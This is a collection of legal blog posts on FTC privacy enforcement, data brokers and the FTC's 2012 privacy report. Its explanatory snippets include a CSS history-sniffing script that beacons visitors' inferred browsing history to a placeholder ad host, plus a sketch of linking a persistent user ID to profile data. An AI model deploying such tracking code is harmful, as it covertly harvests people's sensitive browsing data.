
January 6, 2013

Privacy and Information Security Monthly Update - January 8, 2013

Please join the Privacy and Information Security Committee for our next program on privacy and information security legislative, regulatory, enforcement and litigation developments, covering developments during the month of December 2012.  To register, email Jeanne Welch at jawelch@vorys.com. All pertinent dial-in information will be provided in your confirmation.

 

Please note that the PowerPoint presentation will be available to members only through the Privacy & Information Security Committee website, http://apps.americanbar.org/dch/committee.cfm?com=AT311550.

December 6, 2012

FTC Settles Online "History Sniffing" Charges

The FTC announced yesterday that it has settled charges that the online advertising network Epic Marketplace Inc. used "history sniffing" to secretly and illegally gather data from millions of consumers about their interest in sensitive medical and financial issues. 

Epic's online advertising network, which has a presence on 45,000 websites, serves as an intermediary between online content publishers and advertisers.  Although Epic's privacy policy claimed that it would collect information only about consumers' visits to sites within its network, according to the FTC complaint this was not in fact the case.  Instead, the complaint alleges that from March 2010 through August 2011, consumers who visited Epic's network sites received a cookie that tracked their site visits outside the ad network, including visits to sites relating to personal health conditions and finances.  The complaint further alleges that the data collected from these cookies enabled Epic to serve targeted ads to these consumers.  The FTC complaint charges that these practices violated Section 5(a) of the FTC Act by falsely representing to consumers that Epic collected information only on consumers' visits to websites within the Epic network.
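For readers unfamiliar with the technique, the sketch below illustrates the classic CSS-based form of "history sniffing." It is only an illustration of the general approach described in the complaint, not Epic's actual code; the probe URLs and beacon endpoint are hypothetical, and modern browsers have since closed this loophole.

```typescript
// Illustrative sketch of CSS-based "history sniffing" (hypothetical URLs).
// Before browsers restricted getComputedStyle on :visited links, a script
// could infer which sites a visitor had been to by checking link colors.
const probeUrls: string[] = [
  "https://health-site.example/condition",  // hypothetical sensitive pages
  "https://loan-site.example/bad-credit",
];

function sniffHistory(urls: string[]): string[] {
  const visited: string[] = [];
  for (const url of urls) {
    const link = document.createElement("a");
    link.href = url;
    document.body.appendChild(link);
    // Older browsers reported the :visited color (commonly rgb(85, 26, 139)),
    // leaking whether the URL was in the user's browsing history.
    if (window.getComputedStyle(link).color === "rgb(85, 26, 139)") {
      visited.push(url);
    }
    link.remove();
  }
  return visited;
}

// The inferred history could then be reported to an ad server via a beacon.
new Image().src =
  "https://ads.example/collect?visited=" +
  encodeURIComponent(JSON.stringify(sniffHistory(probeUrls)));
```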

The FTC consent order in the matter bars Epic from using history sniffing and requires that it delete and destroy all data collected using it, among other things.  The order was placed on the public record for thirty days.

The FTC announced the settlement on the eve of today's "Future of Comprehensive Data Collection" workshop to explore the practices and privacy implications of comprehensive data collection about consumers' online behavior.

November 28, 2012

Data Brokers: The Feds are Watching YOU

Data brokers are invisible to consumers and unbridled by regulation. The Federal Trade Commission (FTC) has repeatedly emphasized the need for targeted legislation to regulate this industry. In an attempt to bolster self-regulatory efforts, the FTC’s March 2012 privacy report, Protecting Consumer Privacy in an Era of Rapid Change: Recommendations for Businesses and Policymakers, calls on data brokers to post their data collection practices and to provide consumers with choices on what information is being collected and retained. However, self-regulatory efforts have largely failed.

Perhaps until now. The following events may change the regulatory landscape for companies engaging in data mining practices.

Lawmakers Release Information on Data Brokers’ Collection and Use of Consumer Information


On November 8, 2012, a bipartisan group of lawmakers, including Reps. Edward Markey and Joe Barton, Co-Chairmen of the Congressional Bi-Partisan Privacy Caucus, released responses to letters sent last July to nine major data brokerage companies regarding their data mining practices. The results were disconcerting. The companies reported that they were collecting consumer data from a variety of sources, including telephone directories, mobile phones, government agencies, financial institutions, social media sites, and consumers themselves. All but one (Acxiom, whose relevance is discussed below) rejected the categorization of their business practices as "data brokerage." And only Acxiom provided information on the number of consumers who had requested access to their information in the last two years: 77 out of the 190 million consumers from whom data had been mined.

In a joint statement released the same day, lawmakers characterized the companies’ responses as offering “only a glimpse of the practices of an industry that has operated in the shadow for years.” Lawmakers vowed to continue their efforts to learn more about the data brokerage industry and to “push for whatever steps are necessary to make sure Americans know how this industry operates and are granted control over their own information.”

Recall that Acxiom Corporation's mining practices were unveiled by the New York Times last June. The Times characterized Acxiom as the world's largest commercial database on consumers, operating tens of thousands of servers to collect and analyze data on hundreds of millions of consumers worldwide, covering trillions of data transactions a year. The article reported that Acxiom and others operate an extremely profitable enterprise, yielding over $77 million per fiscal year, and enjoy a broad customer base of banks, investment services, automakers, department stores, and just about any major company looking for insight into its consumers.

FTC Settlement with Online Data Brokerage Company, Compete, Inc.

On October 22, 2012, the FTC announced its proposed settlement with web analytics company Compete, Inc. The FTC alleged the company used web-tracking software to follow the browsing behavior of millions of consumers without disclosing the extent of the information being collected. Compete got unwitting consumers to download the tracking software by, among other things, promising rewards for sharing opinions about products and services on an online forum. Once installed, the tracking component collected information about consumers’ online activity and captured information consumers entered into websites, including consumers’ usernames, passwords, credit card and financial account information, security codes, and Social Security Numbers. Compete then compiled this data to generate consumer reports, which it sold to clients wanting to improve their website traffic and sales. The FTC alleged the company failed to adopt reasonable data security practices and deceived consumers about the amount of personal information that its website would collect, and also charged Compete with deceptive practices for falsely claiming that the data it kept was anonymous. The proposed settlement requires Compete to obtain consumers’ express consent before collecting any data from software downloaded onto consumers’ computers, to delete personal information already collected, and to provide directions for uninstalling its software.

FTC to Host December 2012 Workshop on Data Mining

On December 6, 2012, the FTC will host a public workshop, entitled “The Big Picture: Comprehensive Data Collection,” which will explore the practices and privacy implications of comprehensive data collection. The FTC’s preliminary agenda includes an examination by consumer protection organizations, academics, business and industry representatives, and privacy professionals of the technological landscape related to data mining, its benefits and risks, consumer knowledge and attitude, and the future of comprehensive data collection. The workshop will likely address many of the questions left unanswered by the nine data brokers queried by lawmakers regarding the companies’ data mining practices.

It remains to be seen whether these events will generate enough legislative momentum to produce industry-wide change. Until then, data brokers will continue their practice of unfettered commercial data mining of sensitive consumer information.

July 2, 2012

FTC Brings Action against Wyndham Hotels for Failure to Protect Consumers' Personal Information

The Federal Trade Commission (FTC) filed a complaint on June 26 against Wyndham Worldwide Corporation and three of its subsidiaries, alleging failure to maintain reasonable and appropriate data security for consumers’ sensitive personal information. The FTC claims that because of this failure, intruders were able to obtain unauthorized access to the Defendants’ computer networks. This led to fraudulent charges on consumers’ accounts, more than $10.6 million in losses, and the export of credit card account information to a domain registered in Russia.

Defendants Controlled the Hotels’ Computer Systems

Independent hotels operating under a franchise agreement with Wyndham Hotels had to use a property management system designed by Defendants, which stored consumers’ personal information, including payment information. This system was linked to the Wyndham Hotels corporate network, much of which was located at a Phoenix, Arizona data center operated by Wyndham Hotels. Only Defendants had administrator access to control the property management systems of the independent hotels. Defendants also had direct control over the computer networks of the Wyndham-branded hotels managed by one of the Defendants, Hotel Management.

Privacy Policies

Wyndham Worldwide was responsible for creating information security policies for itself and for its subsidiaries, and for overseeing subsidiaries’ information security programs.

Defendants have published privacy policies on their websites since at least 2008, claiming that they would safeguard customers’ personally identifiable information “by using standard industry practices” and would “take commercially reasonable efforts to create and maintain ‘fire walls’ and other appropriate safeguards” to protect customers’ information.

Inadequate Data Security Practices

However, the FTC claims that Defendants’ data security practices were inadequate, and thus unnecessarily exposed consumers’ personal data to unauthorized access and theft. Defendants’ security failures led to fraudulent charges on consumers’ accounts.

The FTC alleges such shortcomings as storing credit card information in clear, readable text, failing to limit access between the different property management systems, and failing to secure the Defendants’ servers. Defendants also did not require the use of complex passwords to access the property management systems and allowed the use of easily guessed passwords.

The FTC claims that these shortcomings allowed intruders to gain unauthorized access into Wyndham Hotels’ computer networks on three separate occasions, using similar techniques in each of the three occurrences.  After discovering each of the first two breaches, Defendants failed to take appropriate measures to prevent another breach.

Violations of the FTC Act

According to the complaint, the representations made in Defendants’ privacy policies were therefore inaccurate. The FTC alleges that even though Defendants represented to their customers that they had implemented reasonable and appropriate measures to protect their personal information against unauthorized access, they had not in fact implemented these measures; the representations made to customers were thus unfair and deceptive and violated the FTC Act. The FTC also claims that this failure to safeguard consumers’ personal information caused or was likely to cause substantial injury to consumers.

 

 

May 24, 2012

Paul Ohm to Join FTC as Senior Advisor on Internet, Privacy, and Mobile Markets

On August 27, Professor Paul Ohm, Associate Professor at the University of Colorado Law School, will join the FTC as a senior policy advisor for consumer protection and competition issues affecting the Internet and mobile markets.  Ohm specializes in topics that include information privacy and cyberlaw.  He has authored numerous law review articles and essays addressing the impact of technology on consumer privacy, and he is a frequent blogger and contributor to FTC roundtables and industry conferences.

Ohm will join the FTC's Office of Policy Planning, which focuses on the development and implementation of long-range competition and consumer protection policy initiatives, and advises staff on cases raising new or complex legal or policy issues.  This will be the second time that Ohm has served the government in a privacy-focused capacity.  He previously served as a federal prosecutor for the U.S. Department of Justice's Computer Crime and Intellectual Property Section.

A press release on Ohm's new role is available here.

May 9, 2012

Federal Trade Commission Announces Privacy Settlement with Myspace

The FTC has brought another tech giant, albeit a waning one, into a settlement agreement over alleged privacy violations. On May 8, the FTC announced a consent decree with Myspace LLC that forbids it from misrepresenting its privacy practices and requires it to institute a comprehensive privacy program and submit to biennial compliance audits for twenty years. This is the third settlement that the FTC has reached with a major tech company in the social networking arena; the agency reached similarly structured settlement agreements with Google and Facebook last year.

The FTC's Allegations

The FTC's allegations stem from a gap between Myspace's privacy policy and its practices from January 2009 until June 2010. In its policy, Myspace promised that it would not share a user's personally identifiable information (defined as name, email address, mailing address, phone number or credit card number) without notice and user consent; that the information it used to customize ads would not individually identify users to advertisers; and that it complied with the U.S.-E.U. Safe Harbor framework for data protection.

However, when Myspace displayed ads from certain unaffiliated third parties to logged-in users, Myspace provided the advertiser or its affiliate with the viewer's "Friend ID," a persistent unique numerical identifier assigned to each Myspace user. This left third parties only a few clicks away from a host of other information about the user. For most users, the Friend ID could be used to obtain the user's full name and any other information designated as public in the user's settings. That public information could then be combined with additional information harvested by the advertiser's tracking cookie or by other means.
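To make the risk concrete, here is a hedged sketch of how a third party holding such a persistent identifier could combine it with public profile data and its own cookie data. The lookup URL, field names, and joining logic are hypothetical illustrations, not Myspace's or any advertiser's actual code.

```typescript
// Hypothetical sketch: joining a persistent "Friend ID" received with an ad
// request to public profile data and the advertiser's own tracking cookie.
interface AdRequest {
  friendId: string;         // persistent per-user identifier (as alleged)
  trackingCookieId: string; // advertiser's own pseudonymous cookie
}

async function buildEnrichedProfile(req: AdRequest) {
  // "A few clicks away": a single lookup of the public profile by ID.
  const resp = await fetch(`https://profiles.example/users/${req.friendId}`);
  const publicProfile = await resp.json(); // e.g. { fullName, age, location }

  // Linking the real-name profile to browsing history keyed by the cookie
  // turns a pseudonymous ad profile into an identified one.
  return { cookie: req.trackingCookieId, ...publicProfile };
}
```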

According to the FTC, the representations that Myspace made in its privacy policies were thus false and misleading and constituted deceptive acts or practices in violation of Section 5 of the FTC Act. The agency also alleged that Myspace misrepresented its compliance with the U.S.-E.U. Safe Harbor framework: to transfer personal data lawfully from the E.U. to the U.S., companies must self-certify that they meet certain privacy principles governing the collection and use of user data, including Notice and Choice. According to the FTC, Myspace did not make the offending statements about Safe Harbor compliance until December 2010, after the time period of its other deceptive practices.

Settlement Terms

The order forbids Myspace from misrepresenting its privacy practices, including the collection, disclosure, and third-party sharing of all "covered information." This includes a user's name, address, e-mail address or chat screen name, phone number, photos and videos, IP address, device ID or other persistent identifier, contact list, and physical location. Like the Google and Facebook settlements, the order requires Myspace to establish and maintain a comprehensive privacy program and submit to biennial assessments of that program by an independent auditor for 20 years. Myspace must also retain a plethora of related documents for five years, including all "widely disseminated statements" about Myspace's privacy practices, complaints or communications with law enforcement about the order, and any documents that call into question Myspace's compliance.

The 20-year timeframe, which has been the standard in FTC's previous privacy consent decrees, has raised some snickers among commentators about Myspace's longevity, given the site's declining market share. Founded in 2003, the site was acquired by News Corp. for $580 million in 2005 and for a while dwarfed Facebook's number of users. However, it was sold to Specific Media for $35 million last year and its number of unique users is less than half of its 2008 peak.

The agreement will be subject to public comment until June 8, after which the Commission will decide whether to make the proposed consent order final.


April 20, 2012

The Federal Trade Commission Publishes its Final Privacy Report (Part II)

This is the second part of a post about the recently published FTC Privacy Report.

Simplified Consumer Choice (Consent)

Some practices do not require choice

Under the Final Framework, companies would not have to provide consumers with a choice if they collect and use data for ‘commonly accepted practices’ (p. 36). Instead of rigidly defining what counts as a commonly accepted practice, the FTC focuses on the interaction between a business and the consumer (p. 38). Is the practice “consistent with the context of the transaction or the consumer’s existing relationship with the business, or is [it] required or specifically authorized by law?” (p. 39).

One may remember that the Telephone Consumer Protection Act has a similar “established business relationship” exception to consent.

However, the six practices originally identified in the preliminary staff report as those that companies may engage in without offering consumer choice (fulfillment, fraud prevention, internal operations, legal compliance, public purpose, and most first-party marketing) remain useful guidance as to whether a particular practice would indeed be considered commonly accepted.

First-party marketing occurs when a company collects customer data and uses it for its own marketing purposes, as opposed to third-party marketing, where collected data is sold to third parties for their own marketing purposes.  An entity having a first-party relationship with a consumer would not be exempt from providing the consumer with choices if it also collects consumer data in a manner not consistent with that first-party relationship, such as tracking the consumer across sites (p. 40-41).

The FTC’s final principle on choice is that companies do not need to provide choice before collecting consumer data for practices that are either consistent with their relationship with the customer or required by law (p. 48).

Companies should give a choice if the practice is inconsistent with the interaction with the consumer 

Such choice should be given “at a time and in a context in which the consumer is making a decision about his or her data” (p. 48).

The FTC still advocates the implementation of a universal, one-stop mechanism for online behavioral tracking (Do Not Track) (p. 52).

A Do Not Track system should include five key principles (p. 53):

1. It should cover all parties tracking consumers.

2. It should be easy to find, understand, and use.

3. The choices offered should be persistent and should not be overridden.

4. It should be comprehensive, effective, and enforceable.

5. It should allow consumers to opt out of receiving targeted advertisements, and also to opt out of the collection of behavioral data for all purposes other than those consistent with the context of the interaction.
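As a rough illustration of the fifth principle, the sketch below shows a Node.js server that checks a "DNT: 1" request header before setting a tracking cookie. This is only one possible implementation of a universal signal, and the endpoint, cookie name, and responses are hypothetical; real Do Not Track compliance covers far more than a single header check.

```typescript
// Minimal Node.js sketch: honor a "DNT: 1" header before doing any tracking.
// Hypothetical endpoint and cookie; illustration only.
import * as http from "http";

http.createServer((req, res) => {
  const dnt = req.headers["dnt"]; // "1" means the user has opted out
  if (dnt === "1") {
    // No tracking cookie, no behavioral data collection, generic ads only.
    res.writeHead(200, { "Content-Type": "text/plain" });
    res.end("generic content, no tracking");
    return;
  }
  // Otherwise the site might set a tracking cookie and serve targeted ads.
  res.writeHead(200, {
    "Set-Cookie": "track_id=abc123; Path=/; HttpOnly",
    "Content-Type": "text/plain",
  });
  res.end("targeted content");
}).listen(8080);
```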

Express consent would, however, be required, at the time and in the context in which the consumer is making his or her decision, if the company uses data in a materially different manner than the one stated when the data was collected, or if it collects sensitive data, such as Social Security numbers, information about children, or financial and health data.

Large platform providers (ISPs, operating systems, browsers…)

Such entities have access to a very large spectrum of unencrypted consumer data, which would allow them to build very detailed consumer profiles. Indeed, an ISP has access to all of a customer's online activity conducted over that particular connection, raising privacy concerns. The FTC will host a workshop in the second half of 2012 to discuss privacy issues raised by data collection by large platforms.

Transparency

There are several ways companies could increase the transparency of their data practices.

            Privacy Notice

Privacy notices should be:

- Clearer

- Shorter

- More standardized

However, according to the FTC, prescribing a rigid privacy statement format to be used in all sectors is “not appropriate.” Some elements, such as terminology and format, should nonetheless be standardized so that consumers can easily compare privacy practices (p. 62).

            Access

Companies should provide reasonable access to the consumer data they maintain, and this access should be proportionate to the sensitivity of the data and the nature of its use (p. 64).

For entities maintaining data solely for marketing purposes, the FTC agrees that the costs of providing consumers a right to access and correct the data would likely outweigh the benefits. Such entities should, however, provide consumers with the list of data categories they keep and inform them of their right to state that they do not want their data used for marketing purposes (p. 65). The Report adds that these companies should offer more individualized access to data where feasible, citing as an example Yahoo’s Ad Interest Manager, which allows users to opt out of certain advertising categories.

The FTC also noted that companies that compile consumer data and sell it to other companies, which then use the data to make decisions about a particular person’s eligibility for a job, an insurance rate, or credit, are subject to the FCRA. Consumers then have a right to access and correct their information under the FCRA, 15 U.S.C. §§ 1681g-1681h, even if the company compiling the data is not certain of the use that will be made of it but “has reason to believe” it will be used for making such decisions (p. 67).

Entities maintaining data for other, non-marketing purposes that fall outside the scope of the FCRA, such as fraud risk management companies or social networking sites, should use a sliding-scale approach: a consumer's access to his or her data would depend on the use being made of it and on its sensitivity (p. 67).

The FTC supports legislation, such as the Data Accountability and Trust Act, which would give consumers a right to access their data held by data brokers. It also supports the creation by the data broker industry of a centralized web site where data brokers would inform consumers about their data collection practices, and disclose the companies buying this data (p. 69).

The FTC also supports the idea of an “eraser button,” which would allow people to delete the content they have posted online, a right somewhat similar to the right to be forgotten stated by the recent EU Commission Proposal for a new privacy framework (p. 70).

            Consumer Education

Consumers should be better educated about commercial data privacy practices, and this should be done by all stakeholders.

April 18, 2012

The Federal Trade Commission Publishes its Final Privacy Report (Part I)

The Federal Trade Commission (FTC) issued its much-awaited final privacy report, “Protecting Consumer Privacy in an Era of Rapid Change: Recommendations for Businesses and Policymakers” (the Report).

The Report provides companies with self-regulation guidelines, and it calls on businesses collecting consumer data to implement best practices to protect this data. According to the Report, “the framework is meant to encourage best practices and is not intended to conflict with requirements of existing laws and regulations” (p. 16).

The FTC believes that self-regulation has not yet gone far enough, with the exception of Do Not Track (p. 11). Yet the Report also recommends that Congress pass baseline, technologically neutral privacy legislation, as well as data security legislation. Privacy legislation would give businesses clear guidance and would also serve as a deterrent by providing remedies to aggrieved parties.  The FTC also recommends the passage of legislation targeted at data brokers, which would allow consumers to access their personal data held by data brokers.

Scope of the Privacy Framework

The framework would apply to all commercial entities collecting or using consumer data that can be reasonably linked to a specific consumer, computer, or other device.

It would not apply, however, to entities that collect only non-sensitive data from fewer than 5,000 consumers a year and do not share that data with third parties; this condition prevents an entity outside the scope of the Framework from selling the data it collects to a data broker.

As noted by the Report, HR 5777, the Best Practices Act, contained a similar exclusion for entities collecting information from fewer than 10,000 individuals during any 12-month period, provided the data is not sensitive.

The framework would, however, apply to both online and offline data, so that data collected by data brokers falls within its scope. As the FTC notes, consumer data collection is ‘ubiquitous,’ whether it occurs online or offline, and the privacy concerns these practices raise are similar (p. 17).

The framework would apply to data that is reasonably linkable to a specific consumer, computer, or device (p. 18).

Under the final framework, data would not be considered “reasonably linkable to a particular consumer or device” if a company implements three significant protections for that data (p. 21):

- Take reasonable measures to ensure that the data is de-identified;

- Publicly commit to maintain and use the data in a de-identified fashion; and

- If making the de-identified data available to third parties, contractually prohibit those third parties from attempting to re-identify the data.
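As a rough illustration of the first, technical protection, the sketch below replaces a direct identifier with a keyed hash and generalizes quasi-identifiers. The field names and method are assumptions for illustration only; the Report does not prescribe any particular de-identification technique.

```typescript
// Hypothetical de-identification step (Node.js): hash the direct identifier
// with a secret key and coarsen quasi-identifiers to reduce linkability.
import { createHmac } from "crypto";

interface RawRecord {
  email: string;
  zipCode: string;      // e.g. "10027"
  birthDate: string;    // e.g. "1985-06-14"
  pagesViewed: string[];
}

const DEID_KEY = process.env.DEID_KEY ?? "store-this-key-separately";

function deIdentify(r: RawRecord) {
  return {
    // One-way keyed hash instead of the raw identifier.
    userToken: createHmac("sha256", DEID_KEY).update(r.email).digest("hex"),
    zip3: r.zipCode.slice(0, 3),        // generalize ZIP to first 3 digits
    birthYear: r.birthDate.slice(0, 4), // keep year only
    pagesViewed: r.pagesViewed,
  };
}
```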

Interestingly, the issue of what constitutes personal data is also being debated in the European Union (EU). Recital 24 of the recent EU Commission data protection proposal hints that IP addresses or cookies need not necessarily be considered personal data, as they must be combined with unique identifiers and other information to allow identification. In a recently published opinion on the proposal, the Article 29 Working Party stated that personal data should be defined more broadly, as all data relating to an identifiable individual, and that IP addresses should thus be considered as relating to identifiable individuals, especially where IP addresses or cookies are processed to identify the users of a computer.

Privacy by Design

The baseline is that “[c]ompanies should promote consumer privacy throughout their organizations and at every stage of the development of their products and services” (p. 22).

Such privacy protections include four substantive principles:

- Data security

- Reasonable collection limits

- Sound retention practices

- Data accuracy

Data Security

The Report notes that the FTC has been enforcing data security obligations under Section 5 of the FTC Act, the FCRA, and the GLBA (p. 24), and that several companies have already implemented data security measures, such as securing payment card data, browser privacy protections, and SSL encryption (p. 25).

            Reasonable Collection Limit

The FTC believes that companies should limit data collection “to that which is consistent with the context of a particular transaction or the consumer’s relationship with the business, or as required or specifically authorized by law” (p. 27).

Sound Data Retention

Companies should not retain data that is no longer necessary for the legitimate purpose for which it was collected. The FTC does not, however, set a data retention timetable. Instead, it states that the retention period can be flexible and may vary according to the type of data collected and its intended use (p. 29).

Data Accuracy

What companies would have to do in order to ensure the accuracy of the data collected depends on the data’s intended use and whether it is sensitive data or not.

Part II to be posted later this week.

March 14, 2012

Commerce Department Launches Multistakeholder Process for Consumer Privacy Codes of Conduct

In response to the White House's February 23, 2012 release of Consumer Data Privacy in a Networked World:  A Framework for Protecting and Promoting Innovation in a Global Digital Economy ("Framework"), the Commerce Department's National Telecommunications and Information Administration ("NTIA") has issued a request for public comments on the consumer data privacy issues to be addressed through voluntary, yet legally enforceable, codes of conduct that implement the Consumer Privacy Bill of Rights outlined in the Framework.  NTIA is seeking comments from all interested stakeholders, including consumer groups, industry, academia, law enforcement agencies, and international partners.  Comments are due on March 26, 2012.

Interested parties may submit comments on any consumer privacy-related topic, though NTIA's request indicates that the Framework's transparency principles in privacy notices for mobile applications ("apps"), particularly apps that feature location-based services, are among the agency's highest priorities.  Other highlighted areas for comment include cloud computing, online services directed toward teens and children, trusted identity systems, and the use of technologies, such as browser-based cookies, to collect personal data.

NTIA also seeks comment on how the multistakeholder process can be structured to ensure openness, transparency, and consensus-building among a diverse group of interested parties.  These comments represent the initial step of a process aimed at developing voluntary codes of conduct that will be enforced by the Federal Trade Commission.

 

 

March 1, 2012

FTC to Host Workshop on Advertising Disclosures Online and in Mobile Media May 30

Yesterday the Federal Trade Commission announced that it will host a day-long public workshop on May 30 to explore whether new guidance is needed for advertising disclosures made both online and in mobile media.  The workshop will address the Dot Com Disclosures and how potential revisions could illustrate clear and conspicuous disclosures in the online and mobile advertising environment.  The FTC began seeking input last year on how to revise the Dot Com Disclosures to account for changes in technology since the guidance was originally issued in 2000.

Topics to be addressed include:

- How can effective disclosures be made in social media and on mobile devices, especially when space is limited for disclosures? 

- When can disclosures provided separately from an initial advertisement be considered adequate?

- What are available options when consumers use devices that do not allow downloading or printing terms of an agreement?

- How can short, effective and accessible privacy disclosures be made on mobile devices?

The FTC also seeks suggestions of topics of discussion and original research.  Requests and recommendations can be sent to dotcomdisclosuresworkshop@ftc.gov.  Additional information is available here.

February 17, 2012

The FTC Publishes a Staff Report on Mobile Apps for Children and Privacy

The Federal Trade Commission (FTC) just released a Staff Report (the Report) titled “Mobile Apps for Kids: Current Privacy Disclosures Are Disappointing.”

 

Mobile applications (apps) are increasingly popular among children and teenagers, even very young ones. Indeed, the Report found that 11% of the apps sold by Apple have toddlers as their intended audience (Report p. 6). Apps geared toward children are often free or inexpensive, which makes them easy to purchase, even on a pocket-money budget (Report p. 7-8).

As such, according to the Report, these apps seem to be intended for children’s use, and some may even be “directed to children” within the meaning of the Children’s Online Privacy Protection Act (COPPA) and the FTC’s implementing Rule (the Rule), which defines a “[w]ebsite or online service directed to children” at 16 C.F.R. § 312.2. Under COPPA and the Rule, operators of online services directed to children under age 13, including apps, must provide notice and obtain parental consent before collecting children’s personal information. Yet the FTC staff was unable, in most instances, to determine whether an app collected any data or, if it did, the type of data collected, the purpose for collecting it, and who collected or obtained access to such data (Report p. 10).

 

‘The mobile app market place is growing at a tremendous speed, and many consumer protections, including privacy and privacy disclosures, have not kept pace with this development’ (Report p.3)

 

Downloading an app on a smartphone may have an impact on children’s privacy, as apps are able to gather personal information such as the user’s geolocation, phone number, or list of contacts, without her parents’ knowledge. Although app stores and operating systems provide rating systems and controls that allow parents to restrict access to mobile content and features, and even to limit data collection, they do not provide information about which data is collected and whether it is shared (Report, p. 15).

 

The Report concludes by recommending that app stores, app developers, and third parties providing services within apps increase their efforts to provide parents with “clear, concise and timely information” about apps downloaded by children. Parents would then be able to know, before downloading an app, what data will be collected, how it will be used, and who will obtain access to it (Report p. 17). This should be done by using “simple and short disclosures or icons that are easy to find and understand on the small screen of a mobile device” (Report p. 3).

 

Recall that United States of America v. W3 Innovations, LLC, in August 2011, was the first FTC case involving mobile applications.

 

February 13, 2012

EPIC is Suing the FTC to Compel Enforcement of Google Buzz Consent Order

The Electronic Privacy Information Center (EPIC) is suing the Federal Trade Commission (FTC) in order to compel the federal agency to enforce the October 2011 Google Buzz consent order, In the Matter of Google, Inc., FTC File No. 102 3136, which was issued following a complaint filed by EPIC with the FTC in February 2010.

 

Pursuant to this consent order, Google may not misrepresent the extent to which it maintains and protects the privacy and confidentiality of the information it collects, including the purposes for which the information is collected and the extent to which consumers may exercise control over its collection, use, or disclosure. Google must also obtain users’ express affirmative consent before any new or additional sharing of their information with third parties, which must be identified, and the purpose(s) for the sharing must be disclosed to users. The consent order also requires Google to establish and implement a comprehensive privacy program.

 

Last January, Google announced changes to its privacy policy, which will be effective March 1, 2012. Google will then start collecting user data across all of its different sites, such as Gmail and YouTube, provided that the user is logged into her Google account. Ms. Alma Whitten, Google’s Director of Privacy, Product and Engineering, stated that Google can thus provide “a simpler, more intuitive Google experience.” A Google user will have one single Google profile; there is, however, no opt-out available. The new privacy policy states that:

 

“We may use the name you provide for your Google Profile across all of the services we offer that require a Google Account. In addition, we may replace past names associated with your Google Account so that you are represented consistently across all our services. If other users already have your email, or other information that identifies you, we may show them your publicly visible Google Profile information, such as your name and photo.”

 

According to EPIC’s complaint, these changes are “in clear violation of [Google’s] prior commitments to the Federal Trade Commission.” EPIC argues that Google violated the Consent Order “by misrepresenting the extent to which it maintains and protects the privacy and confidentiality of [users’] information, by misrepresenting the extent to which it complies with the U.S.-EU Safe Harbor Framework… [and] by failing to obtain affirmative consent from users prior to sharing their information with third parties.”

 

Indeed, the European Union (EU) is also concerned about these changes. The Article 29 Working Party sent a letter to Google on February 2 to inform the California company that it would “check the possible consequences for the protection of the personal data of [E.U. Member States’] citizens” of these changes. Google answered the Commission Nationale de l’Informatique et des Libertés (CNIL), France’s Data Protection Authority, which is in charge of coordinating the inquiry into Google’s privacy changes, that the changes were made to ensure that Google’s privacy policy is “simpler and more understandable” and also “to create a better user experience.”

 

Meanwhile, EPIC argues that the FTC has a non-discretionary obligation to enforce a final order, yet has taken no action with respect to the upcoming changes to Google’s privacy policy.

January 10, 2012

FTC Scrutiny of Web Browser Toolbar Signals Continued Online Privacy Enforcement in 2012

A recent FTC settlement underscores that, in 2012, the FTC will continue to hold companies accountable for providing full disclosures about the extent to which their online services collect and transmit personal information. On January 5, 2012, the FTC announced a settlement with Upromise, Inc., a membership service that helps consumers save money for college, over charges that the company misled users about the extent to which it collected and shared their personal information through a “Personalized Offers” feature on a web browser toolbar, and then failed to properly secure the user information that it collected.
 
Upromise provides a service that allows users to contribute to a college savings account by collecting rebates that are acquired when users purchase goods and services from Upromise partner merchants. Upromise provided users with a web browser toolbar that highlighted Upromise’s partner merchants appearing in a user’s search results, thereby enabling users to more easily identify merchants that provide the college-savings rebates.
 
According to the FTC, when users enabled the “Personalized Offers” feature, the toolbar collected and transmitted the names of the websites visited by users, as well as information that users entered into those websites, including search terms, user names and passwords, and financial information. The Commission also alleged that users who downloaded the toolbar were told by Upromise that any personal information collected would be removed before it was transmitted, and that Upromise had security features in place to protect the personal information. The FTC claimed that Upromise’s alleged actions were unfair and deceptive and violated the FTC Act.
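Upromise allegedly told users that personal information would be removed before transmission. Purely as a hypothetical illustration of what that kind of client-side scrubbing could look like (this is not Upromise's code, and the field names and patterns are assumptions), consider the sketch below.

```typescript
// Hypothetical sketch of scrubbing obvious personal data from captured form
// fields before transmission; patterns and field names are illustrative only.
const SENSITIVE_FIELD_NAMES = /pass(word)?|ssn|card|cvv|account/i;
const SSN_PATTERN = /\b\d{3}-\d{2}-\d{4}\b/g;
const CARD_PATTERN = /\b(?:\d[ -]?){13,16}\b/g;

function scrub(fields: Record<string, string>): Record<string, string> {
  const out: Record<string, string> = {};
  for (const [name, value] of Object.entries(fields)) {
    if (SENSITIVE_FIELD_NAMES.test(name)) {
      out[name] = "[removed]";                // drop whole sensitive fields
      continue;
    }
    out[name] = value
      .replace(SSN_PATTERN, "[removed]")      // mask SSN-like strings
      .replace(CARD_PATTERN, "[removed]");    // mask card-number-like strings
  }
  return out;
}

// Example: scrub({ search: "loans", password: "hunter2" })
// => { search: "loans", password: "[removed]" }
```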
 
The FTC settlement bars Upromise from using its web browser toolbar to collect users’ personal information without clearly and conspicuously disclosing the extent of its data collection practices before users download the toolbar. Upromise also must destroy any personal information previously collected through the “Personalized Offers” feature, obtain consumers’ consent before installing or re-enabling its toolbar products, and notify users how to uninstall the toolbars currently residing on their computers. The settlement further bars Upromise from making material misrepresentations about the extent to which it protects the privacy and security of consumers’ personal information, and requires the company to establish a comprehensive information security program that includes biennial independent security audits for the next 20 years.
 

December 28, 2011

FTC Warns ICANN About Domain Name Expansion

The FTC recently sent a detailed 15-page letter to the Internet Corporation for Assigned Names and Numbers (ICANN) expressing concern that the organization's plan to expand the domain name system could leave consumers open to online fraud and undermine law enforcers' ability to track online scammers.  The House Energy and Commerce Committee has also expressed concern about ICANN's expansion plan.

ICANN has overseen the allocation of Internet domain names since 1998.  The organization intends to expand generic top-level domain names (gTLDs), such as ".com", ".net", and ".org", to include many new domain names, such as the name of a company or a business category (e.g., ".restaurant").  According to the FTC letter, gTLD expansion could create a "dramatically increased opportunity for consumer fraud." In particular, the letter outlines a concern that "the proliferation of existing scams, such as phishing, is likely to become a serious challenge given the infinite opportunities that scam artists will now have at their fingertips.  Fraudsters will be able to register misspellings of businesses, including financial institutions, in each of the new gTLDs, create copycat websites, and obtain sensitive consumer data with relative ease before shutting down the site and launching a new one."  The FTC letter urges ICANN to take additional steps before rolling out new domain names, and suggests that ICANN implement a pilot program before proceeding with a full expansion.
